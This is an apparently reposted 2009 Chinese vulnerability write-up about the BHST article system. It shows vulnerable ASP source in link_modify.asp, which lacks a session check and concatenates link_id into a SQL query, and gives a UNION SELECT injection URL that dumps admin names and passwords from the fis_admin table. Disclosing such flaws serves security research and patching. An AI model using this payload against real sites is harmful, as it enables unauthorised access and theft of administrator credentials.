安基网 首页 安全 安全学院 查看内容

BHST文章系统漏洞

2009-6-23 11:00| 投稿: security


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要:   作者:Jshell   Blog:http://www.jshell.cn   发布于鸡拔毛IT潮人社区   http://www.jbmao.com   首先说下作者在程序中代码的顺序错...
  作者:Jshell   Blog:http://www.jshell.cn   发布于鸡拔毛IT潮人社区   http://www.jbmao.com   首先说下作者在程序中代码的顺序错误   <!--#include file="../conn.asp"-->   <%   if session("adminuser")="" then   response.Redirect("login.asp")   end if   %>   <%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">   <html xmlns="http://www.w3.org/1999/xhtml">   <%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>   这样一句好像是多此一举 而且位置放错了 程序使用的是vbscript 默认的   不要这句的 而且这句只能放在代码的最顶端吧   漏洞出现在 fis/login/link_modify.asp 里 看了下后台文件 大都有   session的验证 唯独这里没有 再看下代码:   <%   linkid=request("link_id")   if linkid<>"" then   set linkrs=server.CreateObject("adodb.recordset")   sqllink="select * from fis_links where link_id="& linkid   linkrs.open sqllink,conn,1,3   %>   典型的不能再典型的注入了 打开表 link_id 数了下一共6个字段 在页面上有   字段内容的rs输出 所以我们使用联合查询直接爆喽   http://127.0.0.1/fis/login/link_ ... 0union%20select%201,admin_name,admin_pass,4,5,6%20from%20fis_admin   如下图:   

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部